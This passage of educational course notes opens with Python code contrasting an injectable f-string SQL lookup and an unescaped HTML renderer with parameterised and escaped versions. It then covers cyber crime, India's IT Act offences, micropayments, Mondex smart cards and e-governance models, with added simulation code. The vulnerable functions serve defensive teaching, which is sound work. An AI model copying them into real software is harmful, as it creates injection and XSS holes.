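    conn.executemany("INSERT INTO citizens (name, tax_id) VALUES (?, ?)",
                     [("Asha", "TAX-0001"), ("Ravi", "TAX-0002")])
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    # The caller's string becomes part of the SQL text, so a quote character
    # inside it changes the statement's structure instead of its data.
    sql = f"SELECT name, tax_id FROM citizens WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    # Parameter binding: the value travels separately from the statement and
    # can only ever be compared as data, whatever characters it contains.
    return conn.execute("SELECT name, tax_id FROM citizens WHERE name = ?", (name,)).fetchall()


def render_vulnerable(name: str) -> str:
    # Reflecting the input unescaped lets any markup in it run in the
    # visitor's browser as part of the page (XSS).
    return f"<p>Results for {name}</p>"


def render_safe(name: str) -> str:
    # Escaping turns <, >, &, and quotes into entities, so the browser shows
    # the input as text and never parses it as a tag or attribute.
    return f"<p>Results for {html.escape(name, quote=True)}</p>"


def compare(conn: sqlite3.Connection, name: str) -> dict:
    """Side-by-side result for one input; useful when reviewing a fix."""
    return {
        "rows_vulnerable": len(lookup_vulnerable(conn, name)),
        "rows_safe": len(lookup_safe(conn, name)),
        "html_safe": render_safe(name),
    }
```

The integrity point from the paragraph above is visible in the row counts: with the vulnerable query a single crafted name returns every record in the table, while the parameterised query returns none, because no citizen is literally named that string. For output, the rule is the same in reverse: escape at the point where data meets HTML, not somewhere upstream where the context is unknown.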

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

PREPARED BY ARUN PRATAP SINGH 54

54

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target, or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms, Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

121 Million Internet Users

65 Million Active Internet Users, up by 28% from 51 million in 2010

50 Million users shop online on Ecommerce and Online Shopping Sites

46+ Million Social Network Users

346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever, with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

- Secures access
- Downloads, copies or extracts any data, computer database or any information
- Introduces or causes to be introduced any virus or contaminant
- Disrupts or causes disruption
- Denies or causes denial of access to any person
- Provides any assistance to any person to facilitate access
- Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section - 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years, or with fine which may extend to five lakh rupees, or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

- Any information that is grossly offensive or has menacing character; or
- Any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
- Any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits, or causes to be published or transmitted, in the electronic form any material which contains sexually explicit act or conduct, shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified, for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000, or the IT Act) is an Act of the Indian Parliament (No 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. User-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated the 30 January 1997, has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce.

Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions -

Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced. Schedules III and IV are deleted.

Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offenses and contraventions
4. Justice dispensation systems for cybercrimes

Offences -

Section | Offence | Punishment
65 | Tampering with computer source documents - intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years or/and with fine up to 2 lakh rupees
66 | Hacking | Imprisonment up to three years or/and with fine up to 5 lakh rupees
66-A | Sending offensive message through electronic means - sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some of the cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of Cyber Security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


MICRO PAYMENT IS -

Very small payments made over the Web. Transactions too small for credit cards. Can be as little as a fraction of a cent. An alternative to subscription and advertising. Can go in either direction.

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.
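As an added illustration of the third-party scheme just described (example code written for these notes, not part of the original material and not any real provider's API), the following Python sketch models a provider that holds user wallets, maps per-fee links to sellers, accumulates micropayments and settles them as single larger payments once a seller's total reaches a minimum. Amounts are kept as integer thousandths of a cent so that fractions of a cent add exactly; the link table, wallet balances and the settlement threshold are constructed sample values.

```python
from collections import defaultdict

# Money is kept as integers in thousandths of a cent (1 cent = 1000 units),
# so that sub-cent fees add exactly instead of drifting as floating point.
MILLICENTS_PER_CENT = 1000


def cents(amount_in_cents):
    """Convert a (possibly fractional) number of cents to integer units."""
    return round(amount_in_cents * MILLICENTS_PER_CENT)


class MicropaymentProvider:
    """Third-party service that monitors, collects and distributes micropayments.

    Users load a wallet in advance; sellers register per-fee links. Each
    payment debits the user's wallet and credits the seller's running total,
    which is paid out only once it reaches the settlement threshold.
    """

    def __init__(self, settlement_threshold):
        self.settlement_threshold = settlement_threshold  # in units
        self.wallets = {}                     # user -> balance
        self.links = {}                       # url -> (seller, fee)
        self.owed = defaultdict(int)          # seller -> accumulated fees
        self.history = []                     # (user, seller, url, fee) records

    def load_wallet(self, user, units):
        self.wallets[user] = self.wallets.get(user, 0) + units

    def register_link(self, seller, url, fee):
        if fee <= 0:
            raise ValueError("fee must be positive")
        self.links[url] = (seller, fee)

    def pay(self, user, url):
        """Charge the per-fee link to the user's wallet. Returns True on success."""
        seller, fee = self.links[url]
        balance = self.wallets.get(user, 0)
        if balance < fee:
            return False                      # insufficient funds: no partial debit
        self.wallets[user] = balance - fee
        self.owed[seller] += fee
        self.history.append((user, seller, url, fee))
        return True

    def settle(self):
        """Pay out every seller whose accumulated total meets the threshold.

        Returns {seller: amount_paid}; totals below the threshold stay pending,
        so no seller receives a payment too small to be worth processing.
        """
        payouts = {}
        for seller, total in list(self.owed.items()):
            if total >= self.settlement_threshold:
                payouts[seller] = total
                self.owed[seller] = 0
        return payouts

    def pending(self, seller):
        return self.owed[seller]


def demo():
    """Constructed scenario: one reader, three content sellers, a 50 cent payout floor."""
    provider = MicropaymentProvider(settlement_threshold=cents(50))
    provider.load_wallet("alice", cents(100))                      # $1.00 prepaid
    provider.register_link("news-site", "/article/1", cents(0.5))  # half a cent per read
    provider.register_link("music-site", "/track/7", cents(25))
    provider.register_link("game-site", "/level/3", cents(30))
    results = [provider.pay("alice", "/article/1") for _ in range(21)]
    results.append(provider.pay("alice", "/track/7"))
    results += [provider.pay("alice", "/level/3") for _ in range(3)]  # third one is declined
    payouts = provider.settle()
    return {
        "accepted": results.count(True),
        "declined": results.count(False),
        "payouts": payouts,                   # only game-site has reached 50 cents
        "pending_news": provider.pending("news-site"),
        "pending_music": provider.pending("music-site"),
        "wallet": provider.wallets["alice"],
    }
```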

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks -

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable for businesses where even small costs for every single transaction would be inefficient [4]. The main benefits from the customer side in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options -

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) of how to pay for desired content or goods.

The most common micropayment options are listed below [6].

Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card: Payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure method (Verified by VISA and MasterCard SecureCode).

Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal account and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses -

Publishing
Marketing
Software
Entertainment
Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing [2]. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized with microchip embedded on it

Two types:
o Memory-only chips
o Microprocessor chips

Can hold up to 32,000 bytes

Newer smart cards have math co-processors
o Perform complex encryption routines quickly

In 1968 German inventors patented the combination of plastic cards with micro chips

Construction of Smart Cards -


Why Smart Cards -

Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats

Advantages -

Flexibility
Security
Portability
Increasing data storage capacity
Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications -

Ticketless travel
o Seoul bus system: 4M cards, 1B transactions since 1996
o Planned: the SF Bay Area system
Authentication, ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks, etc.
Keep transaction records
Password protection and "lock card" functions
Portable balance finder to check balance
Support multiple currencies


ADVANTAGES

CONSUMER -

Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases

MERCHANT -

Reliable off-line payment
Higher security
Low transaction cost
Reduced cash handling

FINANCIAL INSTITUTION -

Strengthen customer relationships
New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? -

Principles protected:

o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information


Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information
o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart-cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.
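To make the overflow problem concrete, here is an added simulation written for these notes (not Mondex's actual card software or protocol): a card keeps its balance and a rolling log of its last 10 offline transfers, as the privacy notes above describe, and the bank reconciles that log against the balance it last saw when the card comes back online. The card identifiers, amounts and the 10-record limit are constructed sample values; the reconciliation check is the point, not the numbers.

```python
from collections import deque

LOG_CAPACITY = 10   # constructed: mirrors the "rolling 10 transactions" kept on the chip


class Card:
    """Stored-value card that can pay another card offline and keeps a bounded log."""

    def __init__(self, card_id, balance=0):
        self.card_id = card_id                 # the unique identification number
        self.balance = balance                 # value (in cents) held on the chip
        self.log = deque(maxlen=LOG_CAPACITY)  # oldest record is silently dropped on overflow
        self.seq = 0                           # per-card transaction counter, never reset

    def transfer(self, other, amount):
        """Offline card-to-card transfer; both cards record it. Returns True on success."""
        if amount <= 0 or amount > self.balance:
            return False                       # cannot spend more than the loaded value
        self.seq += 1
        other.seq += 1
        self.balance -= amount
        other.balance += amount
        self.log.append(("out", self.seq, other.card_id, amount))
        other.log.append(("in", other.seq, self.card_id, amount))
        return True


class Bank:
    """Issuer that learns about offline spending only when a card comes back online."""

    def __init__(self):
        self.known_balance = {}   # card_id -> balance at the last online contact
        self.last_seq = {}        # card_id -> card counter at the last online contact
        self.ledger = []          # every transaction record that was ever uploaded

    def load(self, card, amount):
        """Online load (or initial issue): afterwards the bank knows the exact balance."""
        card.balance += amount
        card.log.clear()
        self.known_balance[card.card_id] = card.balance
        self.last_seq[card.card_id] = card.seq

    def upload(self, card):
        """Reconcile the uploaded log against the balance seen at the last contact.

        Returns (unexplained_change, lost_records). unexplained_change is the part
        of the balance movement that no uploaded record accounts for; lost_records
        is how many transfers the chip performed but could no longer show. Both are
        zero unless the rolling log overflowed between two online contacts.
        """
        explained = sum(amt if direction == "in" else -amt
                        for direction, _seq, _peer, amt in card.log)
        self.ledger.extend((card.card_id,) + rec for rec in card.log)
        expected = self.known_balance[card.card_id] + explained
        unexplained = card.balance - expected
        done_since_last = card.seq - self.last_seq[card.card_id]
        lost = max(0, done_since_last - len(card.log))
        card.log.clear()
        self.known_balance[card.card_id] = card.balance
        self.last_seq[card.card_id] = card.seq
        return unexplained, lost


def demo():
    """Constructed scenario: 12 offline payments between two uploads, 10-record log."""
    bank = Bank()
    alice = Card("CARD-0001")
    shop = Card("CARD-0002")
    bank.load(alice, 5000)                     # $50.00 loaded online
    bank.load(shop, 0)                         # merchant card issued empty
    for _ in range(12):
        alice.transfer(shop, 100)              # twelve $1.00 offline purchases
    # Only the last 10 records survive on each chip, so the bank sees $2.00 of
    # movement on each side that no record explains, and counts 2 lost records.
    return bank.upload(alice), bank.upload(shop)
```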

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B), government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available - government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance -

Both the terms are treated to be the same; however, there is some difference between the two. E-government is the use of ICTs in public administration - combined with organizational change and new skills - to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to be congruent with the definition of e-governance, is that there is no provision for governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of the technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been met with. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budget for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government, and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or anywhere through the network. This is because of the characteristics of CORBA: it is a location transparent, language independent, implementation independent and Operating System independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, or any new Web application, or could even be a database environment using Oracle, etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as Distributed Computing Environment (DCE), the Kerberos Protocol and Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Socket Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly

G2B (Government to Business)

Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
• Generally, but not always, involving:
  - Long Term Contracts
  - User Charges and/or Payments flowing between the Parties
  - Shared Investments, but Mainly Private


  - Risk Sharing by the Parties
• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations


• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition - For and In the Market


The Need to Set the Right Priorities - Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:

- Shared goals
- Shared resources (time, money, expertise, people)
- Shared risks
- Shared benefits

Benefits:

- Expedited project completion
- Project cost savings
- Improved quality
- Use of private resources
- Access to new sources of private capital

Two Major Steps:


- Crafting the Partnership
- Implementing the Partnership

Project Management - Six Distinct Phases

Genesis
- What's the need?
- What's driving the need/rationale? Facility non-compliance, natural disaster, budget deficit
- Is there a need for a Public/Private Partnership?


- Preliminary Project Definition

Feasibility
- Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
- Market Research
- Economic/Financial Analysis
- Program, Budget and Schedule
- Risk Analysis

Plan and Test
- Final project definition
- What is the best way to complete the project?
- Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
- Master Schedule/Budget
- Political Climate
- Any potential "fatal flaws" that could derail the project?

Procurement and Contracting
- How do you choose and contract with the best-value private partner?
- What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
- What do current statutes allow?
- Procurement Approach: Sole Source, RFP, Low Bid
- Risk Allocation between Public and Private Partners
- Structuring of Contract/Risks and Rewards


Implement
- Environmental
- Design
- Permitting
- Construction
- Commissioning and Administration

Operate
- Startup
- Monitoring
- Assessment
- Enhancement
- Contract Modifications
- Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

